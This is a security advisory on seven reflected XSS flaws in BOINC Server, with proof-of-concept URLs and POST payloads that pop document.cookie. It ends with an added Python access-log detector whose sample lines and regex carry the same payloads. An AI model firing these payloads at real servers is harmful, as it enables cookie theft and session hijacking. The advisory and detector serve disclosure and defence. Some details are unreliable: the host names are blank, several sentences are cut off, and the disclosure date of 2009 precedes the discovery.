#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:     BOINC Server
# Vendor:      BOINC
# CSNC ID:     CSNC-2025-002
# CVE ID:      CVE-2025-0666
# Subject:     Multiple reflected XSS Injections
# Risk:        High
# Effect:      Remotely exploitable
# Researcher:  Raphaël Arrouas (Xel) via Managed Bugbounty Program
# Coordinator: Michael Häseler
# Date:        21.01.2025
#
#############################################################

Introduction
------------

BOINC is a software platform for "volunteer computing": large-scale
distributed high-throughput computing using volunteered home computers
and other resources. [1]

Affected
--------

Vulnerable:
 * All versions <= 1.4.7

Not vulnerable:
 * All versions > 1.4.7

Not tested:
 *

Technical Description
---------------------

# Vulnerability 1

There is a reflected XSS in the "venue" parameter of the
host_venue_action.php module.

This can be triggered by issuing a GET request with the "venue"
parameter value

The full URL to trigger the XSS payload will look like:

https:///host_venue_action.php?venue=%3Csvg/onload=alert(document.cookie)%3E

# Vulnerability 2

There is a reflected XSS by XML injection in the "request" parameter of
the job_file.php module.

To exploit it the following payload can be inserted into the "request"
parameter of a POST request to the job_file.php endpoint:

<script xmlns="http://www.w3.org/1999/xhtml">alert(document.cookie)<![CDATA[]]></script>

# Vulnerability 3

There is a reflected XSS affecting the "cols" parameter in the
prefs_edit.php module.

This can be triggered by issuing a GET request with the "cols"
parameter value >

The full URL to trigger the XSS payload will look like:

https:///prefs_edit.php?subset=global&cols=%3E%3C/a%3E%3Csvg/onload=alert(document.cookie)%3E

# Vulnerability 4

There is a reflected XSS affecting the in the openid_login.php module.

This can be triggered by issuing a GET request with the value > for the
query string.

The full URL to trigger the XSS payload will look like:

https:///openid_login.php?zzzz=%3Csvg/onload=alert(document.cookie)%3E

# Vulnerability 5

There is a reflected XSS affecting the "result_name" parameter in the
get_output.php module. Specifically the result_file sub command is
vulnerable.

This can be triggered by issuing a GET request with the "result_name"
parameter value

The full URL to trigger the XSS payload will look like:

https:///get_output.php?cmd=result_file&auth_str=zz&result_name=%3Csvg/onload=alert(document.cookie)%3E&file_num=1

# Vulnerability 6

There is a reflected XSS affecting the "wu_name" parameter in the
get_output.php module. Specifically the workunit_file sub command is
vulnerable.

This can be triggered by issuing a GET request with the "wu_name"
parameter value

The full URL to trigger the XSS payload will look like:

https:///get_output.php?cmd=workunit_file&auth_str=zz&wu_name=%3Csvg/onload=alert(document.cookie)%3E&file_num=1

# Vulnerability 7

There is a reflected XSS by XML injection in the "request" parameter of
the submit_rpc_handler.php module.

To exploit it the following payload can be inserted into the "request"
parameter of a POST request to the submit_rpc_handler.php endpoint:

<script xmlns="http://www.w3.org/1999/xhtml">alert(document.cookie)<![CDATA[]]></script>

Workaround / Fix
----------------

Update to the most recent version of BOINC Server.

Timeline
--------

2024-12-19: Discovery of vulnerability #1 by Hunter
2024-12-20: Discovery of vulnerabilities #2-7 by Hunter
2025-01-27: Assigned CVE-2025-0666
2025-02-03: Initial vendor notification
2025-03-12: Initial vendor response
2025-03-17: Release of fixed Version / Patch
2009-XX-XX: Public disclosure date

References
----------

[1] https://github.com/BOINC/boinc
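Operators who cannot update immediately can at least watch their web server access logs for attempts against the GET-based issues above (#1, #3, #4, #5 and #6). The following detector is an added example written for this page; it is not part of the Compass advisory and not BOINC code. It assumes Apache/nginx combined log format and uses only the endpoint and parameter names the advisory lists; all log lines in it are constructed. Issues #2 and #7 carry their payload in a POST body, which a plain access log does not record, so they are out of scope here.

```python
"""Detect exploitation attempts against the reflected XSS parameters named in
CSNC-2025-002 (CVE-2025-0666) in combined-format web server access logs.

Added example for this advisory page (not Compass or BOINC code).
Assumptions: combined log format, endpoints served from the web root.
All sample log lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint -> parameters named in the advisory. None means "any parameter":
# openid_login.php reflects the raw query string rather than a specific name.
AFFECTED = {
    "/host_venue_action.php": {"venue"},
    "/prefs_edit.php": {"cols"},
    "/openid_login.php": None,
    "/get_output.php": {"result_name", "wu_name"},
}

# Combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Markup that has no business in these parameters: a tag start (<svg, </a, <!)
# or an event-handler attribute such as onload= / onerror=.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%253C -> %3C -> <)
    are still caught; stop once decoding no longer changes the value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(target):
    """Return [(parameter, decoded_value)] for affected parameters of an
    affected endpoint whose value contains markup; [] for everything else."""
    parts = urlsplit(target)
    if parts.path not in AFFECTED:
        return []
    watched = AFFECTED[parts.path]
    hits = []
    # parse_qsl splits on '&' and the first '=' only, then decodes once.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if watched is not None and name not in watched:
            continue
        decoded = decode_fully(value)
        if MARKUP_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_access_log(lines):
    """Parse each log line and collect one finding per suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        client, when, method, target, status = m.groups()
        for param, value in scan_request(target):
            findings.append({
                "client": client, "time": when, "method": method,
                "path": urlsplit(target).path, "param": param,
                "value": value, "status": status,
            })
    return findings


# Constructed sample log: one benign request, four attempts against the
# advisory's GET endpoints (one double-encoded), one unrelated page carrying
# markup, and a POST whose body the access log cannot show.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Jan/2025:10:00:01 +0100] "GET /host_venue_action.php?venue=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Jan/2025:10:00:02 +0100] "GET /host_venue_action.php?venue=%3Csvg/onload=alert(1)%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [21/Jan/2025:10:00:03 +0100] "GET /prefs_edit.php?subset=global&cols=%3E%3C/a%3E%3Csvg/onload=alert(1)%3E HTTP/1.1" 200 700',
    '203.0.113.9 - - [21/Jan/2025:10:00:04 +0100] "GET /openid_login.php?zzzz=%253Csvg/onload=alert(1)%253E HTTP/1.1" 200 300',
    '203.0.113.9 - - [21/Jan/2025:10:00:05 +0100] "GET /get_output.php?cmd=workunit_file&auth_str=zz&wu_name=%3Csvg/onload=alert(1)%3E&file_num=1 HTTP/1.1" 200 300',
    '198.51.100.2 - - [21/Jan/2025:10:00:06 +0100] "GET /forum_thread.php?id=%3Cb%3E HTTP/1.1" 200 900',
    '203.0.113.9 - - [21/Jan/2025:10:00:07 +0100] "POST /job_file.php HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} {f['param']}={f['value']!r}")
```

The decoder loop matters: a single `unquote` misses the `%253C` form in the fourth sample line, while the endpoint allow-list keeps markup on unrelated pages (the forum line) from producing noise. A 200 status on a flagged line is the interesting case, since it means the unpatched page reflected the value back.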